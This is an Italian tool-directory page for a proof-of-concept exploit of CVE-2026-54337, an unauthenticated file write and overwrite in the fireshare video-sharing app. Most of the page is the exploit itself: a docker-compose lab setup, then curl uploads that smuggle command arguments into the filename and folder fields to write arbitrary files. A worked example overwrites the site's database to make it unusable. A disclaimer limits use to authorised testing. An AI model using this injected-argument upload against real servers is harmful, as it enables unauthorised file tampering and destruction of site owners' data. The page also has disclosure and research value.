Skip to content
KitploitKITPLOIT
StrumentiBlog
Invia
StrumentiBlog
Invia

Strumenti di Hacking, PenTest e Cybersecurity per il tuo Arsenale di Sicurezza!

Kitploit è una directory di strumenti di hacking, cybersecurity e pentesting. Scopri gli ultimi aggiornamenti dei progetti per trovare vulnerabilità, analizzare sistemi, automatizzare i test e rafforzare la tua sicurezza.

··Feed·Contatto·Privacy·© 2026 Kitploit

Directory degli strumenti

Categorie

Vedi tutte le categorie
Loading categories
CVE-2026-54337-PoC — CVE-2026-54337 - PoC per Scrittura/Sovrascrittura di File non autenticata per fireshare <= 1.16.3 | Kitploit
Strumenti/GitHubGitHub/4qu4r1um/cve-2026-54337-poc
Analisi delle VulnerabilitàExploitSfruttamento di Applicazioni WebCTFPenetration TestingApprendimento e Formazione
GitHub4qu4r1um/cve-2026-54337-poc

CVE-2026-54337-PoC

CVE-2026-54337 - PoC per Scrittura/Sovrascrittura di File non autenticata per fireshare <= 1.16.3

Vedi Repository
2 mesi faNon ancora revisionato

Più Popolari

Vedi tutti →

Scopri gli strumenti più utilizzati dalla nostra community.

Esplora tutti gli strumenti

Sfoglia la nostra collezione di strumenti

Vedi tutti gli strumenti →
Condividi

CVE-2026-54337 PoC

CVE-2026-54337 - Scrittura/Sovrascrittura di file non autenticata in fireshare <= 1.16.3 PoC

Per maggiori informazioni, fare riferimento a questo avviso di Github

Setup

  • Si prega di utilizzare il seguente docker-compose.yml per testare
root@kitploit:~
services:
  fireshare:
    container_name: fireshare-temp
    image: shaneisrael/fireshare:1.6.13-lite

    ports:
      - "8082:80"

    # Ephemeral storage (discarded when container stops)
    tmpfs:
      - /data
      - /processed
      - /videos
      - /images

    environment:
      - ADMIN_USERNAME=admin
      - ADMIN_PASSWORD=admin123
      - SECRET_KEY=fireshare-super-secret-random-key
      - DOMAIN=
      - PUID=1000
      - PGID=1000

    restart: unless-stopped

Exploit

  • Passo 1: Crea un qualsiasi file purché lo denomini con estensione .mp4, per esempio
root@kitploit:~
$ echo 123 > test.mp4
  • Passo 2: Esegui il seguente comando curl (assicurati di cambiare il segnaposto
root@kitploit:~
$ curl -s -w "HTTP %{http_code}\n" \
  -F "file=@<FILEPATH>;filename=<FILE TO OVERWRITE/WRITE> -select_streams v.mp4" \
  -F "folder=testfolder -o <DIRECTORY TO PUT THE FILE>" \
  http://<URL>/api/upload/public

Per esempio, per sovrascrivere /data/db.sqlite modificherai il comando come segue

root@kitploit:~
$ curl -s -w "HTTP %{http_code}\n" \
  -F "file=@<FILEPATH>;filename=db.sqlite -select_streams v.mp4" \
  -F "folder=testfolder -o data" \
  http://<URL>/api/upload/public

Note

  • Poiché per impostazione predefinita, il servizio viene eseguito sotto l'utente nginx, che ha accesso solo a /data, /processed, /images e /videos, quindi puoi solo scrivere/sovrascrivere lì
  • Per questo motivo, a mio parere, sovrascrivere /data/db.sqlite ha il maggiore impatto poiché renderà il sito web inutilizzabile

Disclaimer

  • Questa proof-of-concept (PoC) è fornita esclusivamente a scopo educativo, di ricerca e di sicurezza difensiva.
  • L'autore non è responsabile per qualsiasi uso improprio, danno, accesso non autorizzato, interruzione del servizio, perdita di dati o conseguenze legali derivanti dall'uso di questo codice. Gli utenti sono gli unici responsabili di assicurarsi di rispettare tutte le leggi, i regolamenti e i requisiti di autorizzazione applicabili prima di utilizzare questa PoC.
  • Questa PoC dovrebbe essere eseguita solo su sistemi per i quali si dispone di esplicita autorizzazione al test. Il test non autorizzato dei sistemi potrebbe essere illegale e non etico.
  • Utilizzando questo software, riconosci di farlo a tuo rischio.
Scarica lo strumento